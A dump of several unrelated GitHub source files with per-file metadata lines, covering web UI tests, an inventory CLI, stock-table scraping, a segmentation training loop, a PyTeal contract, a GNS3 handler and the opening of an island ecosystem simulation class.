@allure.description("Testing Your Library Playlists cards")
@pytest.mark.Do
@pytest.mark.YourLibrary
def test_case_2(self, setup):
time.sleep(2)
web_player_home = WebPlayerHome(self.driver)
web_player_home.click_your_library()
time.sleep(2)
web_player_library = WebPlayerLibrary(self.driver)
if web_player_library.check_card_click(0, True):
self.helper.report_allure("SUCCESS: Your Library page playlist cards are functional")
assert True
else:
self.helper.report_allure("FAILURE: Your Library page playlist cards are not functional")
assert False
# Test #3 -> Liked Songs Text Button
@allure.severity(allure.severity_level.BLOCKER)
@allure.story("Clicking on the Liked Songs Text in the card in Your Library Page")
@allure.title("Clicking Liked Songs Card text")
@allure.description("Clicking on the Liked Songs Text in the card in Your Library Page")
@pytest.mark.Do
@pytest.mark.YourLibrary
def test_case_3(self, setup):
time.sleep(2)
web_player_home = WebPlayerHome(self.driver)
web_player_home.click_your_library()
time.sleep(2)
web_player_library = WebPlayerLibrary(self.driver)
web_player_library.click_liked_songs_txt()
if self.helper.url_has("webplayer/likedplay"):
self.helper.report_allure("SUCCESS: The Liked Songs Card button in your Library page is functional")
assert True
else:
self.helper.report_allure("FAILURE: The Liked Songs Card button in your Library page is not functional")
assert False
# Test #4 -> Your Library Button with empty playlist
@allure.severity(allure.severity_level.BLOCKER)
@allure.story("Testing Your Library Liked Songs Play Button with empty playlist")
@allure.title("Liked Songs Play Button with empty playlist")
@allure.description("Testing Your Library Liked Songs Play Button with empty playlist")
@pytest.mark.Do
@pytest.mark.YourLibrary
def test_case_4(self, setup_final):
web_player_home = WebPlayerHome(self.driver)
web_player_home.click_logout()
time.sleep(2)
web_player_home.click_login()
time.sleep(3)
lp = LoginPage(self.driver)
lp.login_to_spotify("abdallah@gmail.com", "1234567")
time.sleep(3)
self.driver.get(self.helper.base_url + "webplayer/home")
time.sleep(3)
web_player_home = WebPlayerHome(self.driver)
web_player_home.click_your_library()
time.sleep(2)
web_player_library = WebPlayerLibrary(self.driver)
if web_player_library.check_liked_songs_click():
assert True
else:
assert False
| Project-X9/Testing | Web_Testing/Tests/test_yourLibrary.py | test_yourLibrary.py | py | 5,634 | python | en | code | 0 | github-code | 36 |
8670535309 | import logging
from cterasdk import CTERAException
def suspend_filer_sync(self=None, device_name=None, tenant_name=None):
"""Suspend sync on a device"""
logging.info("Starting suspend sync task.")
try:
device = self.devices.device(device_name, tenant_name)
device.sync.suspend(wait=True)
logging.info("Suspended sync on %s", device.name)
except Exception as e:
logging.warning(e)
logging.error("Error suspending sync")
| ctera/ctools | suspend_sync.py | suspend_sync.py | py | 477 | python | en | code | 4 | github-code | 36 |
19509726145 | #README
'''
buka file dengan cara mengetikan:
python main.py "folder_yang_berisi_data_csv"
selama fungsi login belum jadi, cara keluar program adalah control + "c"
'''
#import modul yang dibuat
from read_csv import load
from add_data import *
from write_csv import save
from login import login
from caritahun import cari_tahun
from see_history import see_gadget_return_history,see_consumable_history,see_gadget_borrow_history
from interface import *
import argparse
import os,time
#inisialisasi Data (Loading Data dari CSV)
parser = argparse.ArgumentParser()
parser.add_argument("folder_location", help="Location of the folder that contains all the data.",nargs='?', const='')
args = parser.parse_args()
if args.folder_location is None:
print("Tidak ada folder yang dimasukkan")
exit()
current_path=os.getcwd()
new_path=os.path.join(current_path,args.folder_location)
if os.path.exists(new_path):
data=load(args.folder_location)
else:
print("Folder tidak ada")
exit()
loaded,user,gadget,consumable,consumable_history,gadget_borrow_history,gadget_return_history=data
#Algoritma Program
#User diminta untuk login
valid=False
while not valid:
valid,curret_id,curret_role=login(user)
while valid:
pilihan=input("Masukkan Pilihan Menu: ")
#Masukkan Fungsi-Fungsi Yang Sudah dibuat disini (F01-F17)
#F01 - Register
if pilihan=='register':
if curret_role=='admin':
add_data_user(user)
else:
print("Fungsi Hanya diperbolehkan untuk Admin")
#F02 - Login
#Sudah di atas
#F03 - Pencarian Gadget Berdasarkan Rarity
if pilihan == "carirarity":
rarity=input("Masukkan rarity yang akan dicari: ")
if rarity=='S' or rarity=='A' or rarity=='B' or rarity=='C':
found=False
for j in range(len(gadget)):
if rarity==gadget[j][4]:
found=True
print("Nama Gadget : ",gadget[j][1])
print("Deskripsi : ",gadget[j][2])
print("Jumlah : ",gadget[j][3])
print("Rarity : ",gadget[j][4])
print("Tahun Ditemukan : ",gadget[j][5])
print("")
if not found:
print("Tidak ada gadget dengan rarity tersebut")
else:
print("Rarity tidak valid")
#F04 - Pencarian Gadget Berdasarkan Tahun
if pilihan=='caritahun':
cari_tahun(gadget)
#F05 - Menambah Item
if pilihan == "tambahitem":
if curret_role=='admin':
cek = 0 #untuk mengecek apakah id_item sudah ada
id_item = input("Masukkan ID: ")
if id_item[0] == 'G':
for i in range(1,len(gadget)):
if gadget[i][0] == id_item:
cek += 1
if cek > 0:
print("Gagal menambahkan item karena ID sudah ada.")
else: #cek == 0 atau id_item belum ada
add_data_gadget(id_item,gadget)
elif id_item[0] == 'C':
for i in range(1,len(consumable)):
if consumable[i][0] == id_item:
cek += 1
if cek > 0:
print("Gagal menambahkan item karena ID sudah ada.")
else: #cek == 0 atau id_item belum ada
add_data_consumable(id_item,consumable)
else:
print("Gagal menambahkan item karena ID tidak valid")
else:
print("Fungsi Hanya diperbolehkan untuk Admin")
#F06 - Menghapus Item
if pilihan=='hapusitem':
if curret_role=='admin':
id_item_yang_akan_dihapus=input("Masukkan ID item yang akan dihapus : ")
if id_item_yang_akan_dihapus[0]=='G':
delete_gadget(id_item_yang_akan_dihapus,gadget)
elif id_item_yang_akan_dihapus[0]=='C':
delete_consumable(id_item_yang_akan_dihapus,consumable)
else:
print("ID tidak cocok")
else:
print("Fungsi Hanya diperbolehkan untuk Admin")
#F07 - Mengubah jumlah pada inventory
if pilihan == "ubahjumlah":
if curret_role=='admin':
id_item_yang_akan_diubah = input("Masukan ID: ")
if id_item_yang_akan_diubah[0]=='G':
ubah_jumlah_gadget(id_item_yang_akan_diubah, gadget)
elif id_item_yang_akan_diubah[0]=='C':
ubah_jumlah_consumable(id_item_yang_akan_diubah, consumable)
else:
print("Tidak ada item dengan ID tersebut!")
else:
print("Fungsi Hanya diperbolehkan untuk Admin")
#F08 - Meminjam Gadget
if pilihan=='pinjam':
if curret_role=='user':
add_data_gadget_borrow_history(curret_id,gadget,gadget_borrow_history)
else:
print("Fungsi Hanya diperbolehkan untuk User")
#F09 - Mengembalikan Gadget
if pilihan=='kembalikan':
if curret_role=='user':
add_data_gadget_return_history(curret_id,gadget,gadget_borrow_history,gadget_return_history)
else:
print("Fungsi Hanya diperbolehkan untuk User")
#F10 - Meminta Consumable
if pilihan=='minta':
if curret_role=='user':
add_data_consumable_history(curret_id,consumable,consumable_history)
else:
print("Fungsi Hanya diperbolehkan untuk user")
#F11 - Melihat Riwayat Peminjaman Gadget
if pilihan=='riwayatpinjam':
if curret_role=='admin':
see_gadget_borrow_history(user,gadget,gadget_borrow_history)
#F12 - Melihat Riwayat Pengembalian Gadget
if pilihan=='riwayatkembali':
if curret_role=='admin':
see_gadget_return_history(user,gadget,gadget_return_history)
else:
print("Fungsi Hanya diperbolehkan untuk Admin")
#F13 - Melihat Riwayat Pengambilan Consumable
if pilihan=='riwayatambil':
if curret_role=='admin':
see_consumable_history(user,consumable,consumable_history)
else:
print("Fungsi Hanya diperbolehkan untuk Admin")
#F14 - Load Data
#Sudah pada baigan awal bersama dengan argparse
#F15 - Save Data
if pilihan=='save':
os.system("cls")
path=input("Masukkan Folder tempat file akan di save: ")
save(path,user,gadget,consumable,consumable_history,gadget_borrow_history,gadget_return_history)
r=50
for i in range (r):
progressBar(i, r)
time.sleep(.02)
time.sleep(1.5)
data=load(path)
loaded,user,gadget,consumable,consumable_history,gadget_borrow_history,gadget_return_history=data
#F16 - Help
if pilihan == 'help':
print("================================= HELP =================================")
print("register - untuk melakukan registrasi user baru")
print("login - untuk melakukan login ke dalam sistem")
print("carirarity - untuk mencari gadget dengan rarity tertentu")
print("caritahun - untuk mencari gadget berdasarkan tahun ditemukan")
if curret_role=='admin':
print("tambahitem - untuk menambahkan item ke dalam inventori")
print("hapusitem - untuk menghapus suatu item pada database")
print("ubahjumlah - untuk mengubah jumlah gadget dan consumable dalam sistem")
print("riwayatkembali - untuk melihat riwayat pengembalian gadget")
print("riwayatambil - untuk melihat riwayat pengambilan consumable")
else:#curret_role=='user'
print("pinjam - untuk melakukan peminjaman gadget")
print("kembalikan - untuk mengembalikan gadget")
print("minta - untuk meminta consumable yang tersedia")
print("save - untuk melakukan penyimpanan data")
print("help - untuk panduan penggunaan penggunaan sistem")
print("exit - untuk keluar dari aplikasi")
#F17 - Exit
if pilihan == 'exit':
pil = input("Apakah anda mau melakukan penyimpanan file yang sudah diubah? (y/n)")
if pil == "y" or pil == "Y":
path = input("Masukkan Folder tempat file akan di save: ")
save(path, user, gadget, consumable, consumable_history, gadget_borrow_history, gadget_return_history)
break
#FB01 - Hashing
#Done pada hashing.py
#FB02 - Mengembalikan Gadget Secara Parsial
#Done
#FB03 - Gacha
if pilihan=='gacha':
#Validasi User
#Sementara id digenerate otomatis. Nantinya current id
id=1
gacha(id,consumable,consumable_history) | bryanbernigen/TubesSem2 | main.py | main.py | py | 8,850 | python | id | code | 0 | github-code | 36 |
8490770607 | #%%
import numpy as np
import pandas as pd
from sklearn import metrics
from matplotlib import pyplot as plt
import glob
#%%
class Takens:
'''
constant
'''
tau_max = 30
'''
initializer
'''
def __init__(self, data,tau=None):
self.data = data
if tau is None:
self.tau, self.nmi = self.__search_tau()
else:
self.tau = tau
'''
reconstruct data by using searched tau
'''
def reconstruct(self):
_data1 = self.data[:-2]
_data2 = np.roll(self.data, -1 * self.tau)[:-2]
_data3 = np.roll(self.data, -2 * self.tau)[:-2]
return np.array([_data1, _data2, _data3])
'''
find tau to use Takens' Embedding Theorem
'''
def __search_tau(self):
# Create a discrete signal from the continunous dynamics
hist, bin_edges = np.histogram(self.data, bins=200, density=True)
bin_indices = np.digitize(self.data, bin_edges)
data_discrete = self.data[bin_indices]
# find usable time delay via mutual information
before = 1
nmi = []
res = None
for tau in range(1, self.tau_max):
unlagged = data_discrete[:-tau]
lagged = np.roll(data_discrete, -tau)[:-tau]
nmi.append(metrics.normalized_mutual_info_score(unlagged, lagged))
if res is None and len(nmi) > 1 and nmi[-2] < nmi[-1]:
res = tau - 1
if res is None:
res = 50
return res, nmi
class Dataset:
def __init__(self,dir_list):
self.root_path_list = dir_list
for dir in self.root_path_list:
path_list = glob.glob(os.path.join(dir, "*.csv"), recursive=True)
if len(path_list)==0:
print(f"Cannot find any files inside {dir}")
self.exp_path_list.extend(path_list)
# self.exp_path_list = [p.replace('./', '') for p in self.exp_path_list if 'old' not in p]
# print(self.exp_path_list)
for path in self.exp_path_list:
df = pd.read_csv(path)
self.eigenworm_exp_list.append(np.array(df.loc[:,self.var_name]))
[self.behavior_label_dict[k].append(df.loc[:,k].values) for k in self.behavior_label_name]
self.stimulus_list.append(np.array(df.loc[:,'led']))
#%%
import itertools
import os
var_name = ['a_1','a_2','a_3','a_4','a_5','VelocityTailToHead']
root_path_list = ['data/141_ASH_02/']
exp_path_list = []
for dir in root_path_list:
path_list = glob.glob(os.path.join(dir, "*.csv"), recursive=True)
if len(path_list)==0:
print(f"Cannot find any files inside {dir}")
exp_path_list.extend(path_list)
dataset = {}
for i, name in enumerate(var_name):
eigenworm_exp_list = []
d = []
for path in exp_path_list:
df = pd.read_csv(path)
d.append(np.array(df.loc[:,name]))
d_1D = list(itertools.chain.from_iterable(d))
dataset[name] = d_1D
#%%
# eigenworm_exp_list = np.array(eigenworm_exp_list)
#
fig, axs = plt.subplots(6,2, figsize=(15,30))
plt_sample_size = 30000
for i, name in enumerate(var_name):
takens = Takens(dataset[name],tau=10)
emd = takens.reconstruct()
tau = takens.tau
axs[i,0].scatter(emd[0,:plt_sample_size],emd[1,:plt_sample_size],s=1,c=dataset["VelocityTailToHead"][:plt_sample_size])
axs[i,1].plot(emd[0,:10000],emd[1,:10000],lw=0.2)
axs[i,0].set_title(name+'\n'+'tau:'+str(tau))
axs[i,1].set_title(name+'\n'+'tau:'+str(tau))
plt.show()
#%%
fig.savefig("tde.png",dpi=150)
#%%
position = np.array(df.loc[:,["posCentroidX","posCentroidY"]])
velocity = np.array(df.loc[:,["VelocityTailToHead"]])
#%%
# plt.plot(emd[0,:1000],emd[1,:1000],'gray',lw=0.1)
plt.scatter(emd[0,:60000],emd[2,:60000],s=1,c=dataset["VelocityTailToHead"][:60000])
plt.savefig('tde_velocity_all.png',dpi=150)
#%%
| kei-mo/BehavCrassificationElegans_TDE | tde.py | tde.py | py | 3,519 | python | en | code | 0 | github-code | 36 |
73485605863 | import argparse
import os
import uuid
import numpy as np
import torch
from torch import optim
from torch.nn import functional
from torch.utils.data import DataLoader
from datasets import load_metric
import albumentations
from albumentations.pytorch import ToTensorV2
from tqdm import tqdm
from utils import set_seed, load_config
from dataset import HarborClassificationDataset, HarborSegmentationDataset
from model import TwinHeadSegformerForSemanticSegmentation
parser = argparse.ArgumentParser(description="Train twin head segformer")
parser.add_argument("--seed", type=int, default=None)
parser.add_argument("--id", type=str, default=None)
parser.add_argument("--num_epochs", type=int, default=None)
args = parser.parse_args()
if args.seed is not None:
set_seed(args.seed)
train_id = args.id
if train_id is None:
train_id = uuid.uuid4().hex
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
config = load_config(os.path.join(os.path.dirname(__file__), "config.yaml"))
train_config = config["train"]["twin_head"]
model_name = config["pretrained_model_name"]
label2id = {k: v + 1 for k, v in config["label2id"].items()}
label2id["background"] = 0
id2label = {v: k for k, v in label2id.items()}
transform = albumentations.Compose([
albumentations.CoarseDropout(
max_holes=16, max_height=0.1, max_width=0.1, min_height=0.05, min_width=0.05, p=0.5
),
albumentations.HorizontalFlip(p=0.5),
albumentations.SafeRotate(15, p=0.5),
albumentations.GaussNoise(p=0.5),
albumentations.OpticalDistortion(p=0.5),
albumentations.OneOf([
albumentations.RGBShift(),
albumentations.RandomToneCurve(),
albumentations.InvertImg(),
albumentations.ToGray()
]),
ToTensorV2()
])
classifier_train_dataset = HarborClassificationDataset.from_config(config)
classifier_train_dataset.set_transform(transform)
train_dataset = HarborSegmentationDataset.from_config(config)
train_dataset.set_transform(transform)
classifier_train_dataloader = DataLoader(
classifier_train_dataset, batch_size=train_config["classifier_batch_size"], shuffle=True
)
train_dataloader = DataLoader(
train_dataset, batch_size=train_config["batch_size"], shuffle=True
)
model = TwinHeadSegformerForSemanticSegmentation.from_pretrained(
model_name,
num_labels=len(id2label),
id2label=id2label,
label2id=label2id,
ignore_mismatched_sizes=True
)
model.to(device)
optimizer = optim.AdamW(
model.parameters(),
lr=float(train_config["learning_rate"]),
weight_decay=float(train_config["weight_decay"])
)
accumulation_steps = train_config["accumulation_steps"]
losses = []
f1_metric = load_metric("f1")
miou_metric = load_metric("mean_iou")
model.train()
num_epochs = args.num_epochs
if num_epochs is None:
num_epochs = train_config["num_epochs"]
step = 0
for epoch in range(1, num_epochs + 1):
for (classifier_pixel_values, classifier_labels), segmenter_batch in tqdm(
zip(classifier_train_dataloader, train_dataloader),
train_id,
total=min(len(classifier_train_dataloader), len(train_dataloader))
):
step += 1
classifier_pixel_values = classifier_pixel_values.to(device)
classifier_labels = classifier_labels.to(device)
pixel_values = segmenter_batch["pixel_values"].to(device)
labels = segmenter_batch["labels"].to(device)
outputs = model(
classifier_pixel_values=classifier_pixel_values,
classifier_labels=classifier_labels,
pixel_values=pixel_values,
labels=labels
)
classifier_logits, logits = outputs.classifier_logits, outputs.logits
loss = (outputs.classifier_loss + outputs.loss) / 2
loss /= accumulation_steps
losses.append(loss.item())
loss.backward()
if step % accumulation_steps == 0:
optimizer.step()
optimizer.zero_grad()
f1_metric.add_batch(
predictions=classifier_logits.argmax(dim=-1).detach().cpu().numpy(),
references=classifier_labels.detach().cpu().numpy()
)
if epoch % train_config["eval_frequency"] == 0:
with torch.no_grad():
upsampled_logits = functional.interpolate(
logits,
size=labels.shape[-2:],
mode="bilinear",
align_corners=False
)
predicted = upsampled_logits.argmax(dim=1)
miou_metric.add_batch(
predictions=predicted.detach().cpu().numpy(),
references=labels.detach().cpu().numpy()
)
micro_f1 = f1_metric.compute(average="micro")["f1"]
if epoch % train_config["eval_frequency"]:
print(
f"epoch: {epoch}\n"
f"├─ loss: {np.mean(losses[-100:]):.6f}\n"
f"└─ micro f1: {micro_f1:.4f}\n"
)
else:
miou_metrics = miou_metric.compute(
num_labels=len(id2label), ignore_index=label2id["background"], reduce_labels=False
)
print(
f"epoch: {epoch}\n"
f"├─ loss: {np.mean(losses[-100:]):.6f}\n"
f"├─ micro f1: {micro_f1:.4f}\n"
f"├─ mIoU: {miou_metrics['mean_iou']:.4f}\n"
f"└─ mAcc: {miou_metrics['mean_accuracy']:.4f}\n"
)
torch.save(model, os.path.join(os.path.dirname(__file__), "checkpoints", f"{train_id}_{epoch}.pt"))
| lexiconium/2022_ai_online_competition-sementic_segmentation | train_twin_head_segformer.py | train_twin_head_segformer.py | py | 5,536 | python | en | code | 0 | github-code | 36 |
13143781971 | # A stream of data is received and needs to be reversed.
#
# Each segment is 8 bits long, meaning the order of these segments needs to be reversed, for example:
#
# 11111111 00000000 00001111 10101010
# (byte1) (byte2) (byte3) (byte4)
# should become:
#
# 10101010 00001111 00000000 11111111
# (byte4) (byte3) (byte2) (byte1)
# The total number of bits will always be a multiple of 8.
#
# The data is given in an array as such:
#
# [1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,1,0,1,0,1,0,1,0]
# Note: In the C and NASM languages you are given the third parameter which is the number of segment blocks.
def data_reverse(data):
out = []
sub = []
i = 0
for b in data:
sub.append(b)
i +=1
if i>7:
out.append(sub)
sub = []
i = 0
out.reverse()
return sum(out, [])
print(data_reverse([1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 0]))
| michsanya/codewars | DataReverse.py | DataReverse.py | py | 989 | python | en | code | 0 | github-code | 36 |
11715375830 | from typing import Literal
import beaker as bk
from pyteal import (
Expr,
Global,
InnerTxnBuilder,
Int,
Seq,
Txn,
TxnField,
TxnType,
abi,
)
app = bk.Application("EventTicket")
@app.external
def create_asset(
assetName: abi.String,
assetUrl: abi.String,
assetTotal: abi.Uint64,
managerAddress: abi.Address,
metadataHash: abi.StaticBytes[Literal[32]],
) -> Expr:
return Seq( # Seq is used to group a set of operations with only the last returning a value on the stack
# Start to build the transaction builder
InnerTxnBuilder.Begin(),
# This method accepts a dictionary of TxnField to value so all fields may be set
InnerTxnBuilder.SetFields(
{
TxnField.type_enum: TxnType.AssetConfig,
TxnField.config_asset_name: assetName.get(),
TxnField.config_asset_url: assetUrl.get(),
TxnField.config_asset_manager: managerAddress.get(),
TxnField.config_asset_clawback: Global.current_application_address(),
TxnField.config_asset_reserve: Global.current_application_address(),
TxnField.config_asset_freeze: Global.current_application_address(),
TxnField.config_asset_total: assetTotal.get(),
TxnField.config_asset_metadata_hash: metadataHash.get(),
TxnField.config_asset_decimals: Int(0),
}
),
# Submit the transaction we just built
InnerTxnBuilder.Submit(),
)
@app.external
def get_asset(asset: abi.Asset) -> Expr:
return Seq( # Seq is used to group a set of operations with only the last returning a value on the stack
# Start to build the transaction builder
InnerTxnBuilder.Begin(),
# This method accepts a dictionary of TxnField to value so all fields may be set
InnerTxnBuilder.SetFields(
{
TxnField.type_enum: TxnType.AssetTransfer,
TxnField.xfer_asset: asset.asset_id(),
TxnField.asset_amount: Int(1),
TxnField.asset_receiver: Txn.sender(),
TxnField.asset_sender: Global.current_application_address(),
}
),
# Submit the transaction we just built
InnerTxnBuilder.Submit(),
)
if __name__ == "__main__":
spec = app.build()
spec.export("artifacts")
| freddyblockchain/AlgokitProject | smart_contracts/code/eventticket.py | eventticket.py | py | 2,429 | python | en | code | 0 | github-code | 36 |
34366485863 | from scripts.leet75.reverse_string import Solution
class Test:
test_cases = [
[["h", "e", "l", "l", "o"], ["o","l","l","e","h"]],
[["H","a","n","n","a","h"], ["h","a","n","n","a","H"]],
[["h"], ["h"]],
[[], []],
]
def test_reverse_string(self):
soln = Solution()
for case, expected in self.test_cases:
assert soln.reverseString(case) == expected
def test_reverse_string_recursive(self):
soln = Solution()
for case, expected in self.test_cases:
assert soln.reverseStringRecursive(case) == expected
if __name__ == '__main__':
soln = Solution()
inp1 = ["h", "e", "l", "l", "o"]
print(soln.reverseString(inp1)) | TrellixVulnTeam/learning_to_test_code_BL81 | tests/leet75/test_reverse_string.py | test_reverse_string.py | py | 740 | python | en | code | 0 | github-code | 36 |
19033561242 | """ Module which contains function determining possible configurations of a mission."""
def get_mission_components(data, root):
"""
Returns all possible combinations of components for a mission which is specified by its
root node (according to the constrained AND-OR tree). This is done by traversing the tree
until we reach the LEAFs - hosts of configuration.
:param data: json containing constrained AND-OR tree
:param root: id of root node for the mission
:return: configurations of the mission
"""
partial_result = [[root]]
complete_result = []
while partial_result:
vertex_list = partial_result.pop(0)
i = 0
original_length = len(vertex_list)
while i < len(vertex_list):
entity_id = vertex_list[i]
if services_contain_id(data['nodes']['services'], entity_id):
vertex_list.pop(i)
for edge in data['relationships']['one_way']:
if edge['from'] == entity_id:
vertex_list.append(edge['to'])
partial_result.append(vertex_list)
break
elif hosts_contain_id(data['nodes']['hosts'], entity_id):
i += 1
continue
elif entity_id in data['nodes']['aggregations']['and']:
vertex_list.pop(i)
for edge in data['relationships']['one_way']:
if edge['from'] == entity_id:
vertex_list.append(edge['to'])
partial_result.append(vertex_list)
break
elif entity_id in data['nodes']['aggregations']['or']:
vertex_list.pop(i)
edge_ends = []
for edge in data['relationships']['one_way']:
if edge['from'] == entity_id:
edge_ends.append(edge['to'])
for end in edge_ends:
partial_result.append(vertex_list + [end])
break
elif missions_contain_id(data['nodes']['missions'], entity_id):
vertex_list.pop(i)
for edge in data['relationships']['one_way']:
if edge['from'] == entity_id:
vertex_list.append(edge['to'])
partial_result.append(vertex_list)
break
if i == original_length:
# contains only hosts
complete_result.append(set(vertex_list))
return complete_result
def hosts_contain_id(hosts_data, host_id):
"""
True if host_id is id of a host.
:param hosts_data: list of hosts
:param host_id: id of a host
:return: True or False
"""
for host in hosts_data:
if host_id == host['id']:
return True
return False
def services_contain_id(services_data, service_id):
"""
Tests if service_id is id of service.
:param services_data: list of services
:param service_id: id of service
:return: True if service_id is service
"""
for service in services_data:
if service_id == service['id']:
return True
return False
def components_contain_id(components_data, component_id):
"""
Tests whether component_id is id of component.
:param components_data: list of components
:param component_id: id of component
:return: True if component_id is component
"""
for component in components_data:
if component_id == component['id']:
return True
return False
def missions_contain_id(missions_data, mission_id):
"""
Tests whether mission_id is id of mission.
:param missions_data: list of missions
:param mission_id: id of mission
:return: True if mission_id is mission
"""
for mission in missions_data:
if mission_id == mission['id']:
return True
return False
| CSIRT-MU/CRUSOE | crusoe_decide/crusoe_decide/components.py | components.py | py | 3,916 | python | en | code | 9 | github-code | 36 |
70477030183 | import os
import pandas as pd
from selenium import webdriver
from selenium.webdriver.common.by import By
from lxml import etree
browser = webdriver.Chrome()
browser.maximize_window() # 창 최대화
# 1. 페이지 이동
url = 'https://finance.naver.com/sise/sise_market_sum.naver?&page='
browser.get(url) # 해당 url로 페이지 이동
# 2. 조회 항목 초기화 (체크 되어 있는 항목 체크 해제)
checkboxes = browser.find_elements(By.NAME, 'fieldIds') # 해당 브라우저(네이버 주식)에 elements들을 찾는데 그 중에 name 속성이 fieldIds인 것들만 찾아 변수에 담아주기
for checkbox in checkboxes:
if checkbox.is_selected(): # 체크된 상태라면
checkbox.click() # 기존 클릭되어 있는걸 다시 클릭하여 클릭 해제 시킨다.
# 3. 조회 항목 설정 (원하는 항목)
items_to_select = ['영업이익', '자산총계', '매출액']
for checkbox in checkboxes:
parent = checkbox.find_element(By.XPATH, '..') # 부모 element를 찾는다. 즉, 여기선 <td> 태그를 찾는다
label = parent.find_element(By.TAG_NAME, 'label') # <td> 태그 안에 있는 label을 찾는다
# print(label.text) # 이름 확인
if label.text in items_to_select: # 선택 항목과 일치 한다면
checkbox.click() # 체크
# 4. 적용하기 버튼 클릭
btn_apply = browser.find_element(By.XPATH, '//a[@href="javascript:fieldSubmit()"]') # //은 html 전체 문서에서 찾겠다는 의미
btn_apply.click()
for idx in range(1, 40): # 1~40 미만 반복
# 4.5 사전작업 : 페이지 이동
browser.get(url + str(idx)) # e.g) https://finance/naver.com/~~~&=1~2...
# 5. 데이터 추출
df = pd.read_html(browser.page_source)[1]
# 데이터 결측치란? 데이터에 값이 없다는 것을 뜻 함. NaN, NA, 료ull
# axis='index' : row 기준으로 삭제,
# how='all' : row(줄) 전체가 데이터가 없다면 지움
# inplace=True : 데이터 반영
df.dropna(axis='index', how='all', inplace=True)
df.dropna(axis='columns', how='all', inplace=True)
if len(df) == 0: # 더 이상 가져올 데이터가 없으면?
break
# 6. 파일 저장 => import os
f_name = 'sise.csv'
if os.path.exists(f_name): # 파일이 있다면? 헤더 제외
df.to_csv(f_name, encoding='utf-8-sig', index=False, mode='a', header=False) # 헤더 제외하고 append 해서 데이터 넣기
else: # 파일이 없다면? 헤더 포함. 즉, 처음 파일 만들 때
df.to_csv(f_name, encoding='utf-8-sig', index=False)
print(f'{idx} 페이지 완료')
browser.quit() # 브라우저 종료 | thisiswoo/python_practice | naver_stock_crawling/market_cap.py | market_cap.py | py | 2,652 | python | ko | code | 0 | github-code | 36 |
24065321916 | import os
import psutil
import platform
from gns3server.web.route import Route
from gns3server.config import Config
from gns3server.schemas.version import VERSION_SCHEMA
from gns3server.compute.port_manager import PortManager
from gns3server.version import __version__
from aiohttp.web import HTTPConflict
class ServerHandler:
@Route.get(
r"/version",
description="Retrieve the server version number",
output=VERSION_SCHEMA)
def version(request, response):
config = Config.instance()
local_server = config.get_section_config("Server").getboolean("local", False)
response.json({"version": __version__, "local": local_server})
@Route.get(
r"/debug",
description="Return debug informations about the compute",
status_codes={
201: "Writed"
})
def debug(request, response):
response.content_type = "text/plain"
response.text = ServerHandler._getDebugData()
@staticmethod
def _getDebugData():
try:
addrs = ["* {}: {}".format(key, val) for key, val in psutil.net_if_addrs().items()]
except UnicodeDecodeError:
addrs = ["INVALID ADDR WITH UNICODE CHARACTERS"]
data = """Version: {version}
OS: {os}
Python: {python}
CPU: {cpu}
Memory: {memory}
Networks:
{addrs}
""".format(
version=__version__,
os=platform.platform(),
python=platform.python_version(),
memory=psutil.virtual_memory(),
cpu=psutil.cpu_times(),
addrs="\n".join(addrs)
)
try:
connections = psutil.net_connections()
# You need to be root for OSX
except psutil.AccessDenied:
connections = None
if connections:
data += "\n\nConnections:\n"
for port in PortManager.instance().tcp_ports:
found = False
for open_port in connections:
if open_port.laddr[1] == port:
found = True
data += "TCP {}: {}\n".format(port, found)
for port in PortManager.instance().udp_ports:
found = False
for open_port in connections:
if open_port.laddr[1] == port:
found = True
data += "UDP {}: {}\n".format(port, found)
return data
| vieyahn/docker-cisco-lab | gns3server/gns3server/handlers/api/compute/server_handler.py | server_handler.py | py | 2,414 | python | en | code | 0 | github-code | 36 |
74330584745 | # -*- coding: utf-8 -*-
__author__ = "Amir Arfan, Sebastian Becker"
__email__ = "amar@nmbu.no, sebabeck@nmbu.no"
"""
Simulation of the Island with visualization
"""
from .map import Map
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import subprocess
import random
import os
import textwrap
_FFMPEG_BINARY = "ffmpeg"
_CONVERT_BINARY = "magick"
_DEFAULT_GRAPHICS_DIR = os.path.join("..", "data")
_DEFAULT_GRAPHICS_NAME = "dv"
_DEFAULT_MOVIE_FORMAT = "mp4" # alternatives: mp4, gif
class BioSim:
"""
Simulation of biosim
"""
rgb_value = {
"O": (0.0, 0.0, 1.0),
"M": (0.5, 0.5, 0.5),
"J": (0.0, 0.6, 0.0),
"S": (0.5, 1.0, 0.5),
"D": (1.0, 1.0, 0.5),
}
def __init__(
self,
island_map,
ini_pop,
seed,
ymax_animals=None,
cmax_animals=None,
img_base=None,
img_fmt="png",
):
"""
:param island_map: Multi-line string specifying island geography
:param ini_pop: List of dictionaries specifying initial population
:param seed: Integer used as random number seed
:param ymax_animals: Number specifying y-axis limit for graph showing animal numbers
:param cmax_animals: Dict specifying color-code limits for animal densities
:param img_base: String with beginning of file name for figures, including path
:param img_fmt: String with file type for figures, e.g. 'png'
If ymax_animals is None, the y-axis limit should be adjusted automatically.
If cmax_animals is None, sensible, fixed default values should be used.
cmax_animals is a dict mapping species names to numbers, e.g.,
{'Herbivore': 50, 'Carnivore': 20}
If img_base is None, no figures are written to file.
Filenames are formed as
'{}_{:05d}.{}'.format(img_base, img_no, img_fmt)
where img_no are consecutive image numbers starting from 0.
img_base should contain a path and beginning of a file name.
"""
self._map = Map(island_map)
self.map_rgb = [
[self.rgb_value[column] for column in row]
for row in island_map.splitlines()
]
self._map.add_animals(ini_pop)
np.random.seed(seed)
random.seed(seed)
self._year = 0
self._final_year = None
self._num_animals = 0
self._num_animals_per_species = {}
self._animal_distribution = None
self.img_fmt = img_fmt
self.img_count = 0
self.img_base = img_base
self._island_map = None
self._fig = None
self._map_ax = None
self._mean_ax = None
self._herb_line = None
self._carn_line = None
self.herb_heat = None
self.carn_heat = None
self.herb_img_axis = None
self.carn_img_axis = None
self.year_counter_active = False
if ymax_animals is None:
self.ymax_animals = 20000
else:
self.ymax_animals = ymax_animals
if cmax_animals is not None:
self.cmax_animals = cmax_animals
else:
self.cmax_animals = {"Herbivore": 50, "Carnivore": 20}
def set_animal_parameters(self, species, params):
"""
Set parameters for animal species.
:param species: String, name of animal species
:param params: Dict with valid parameter specification for species
"""
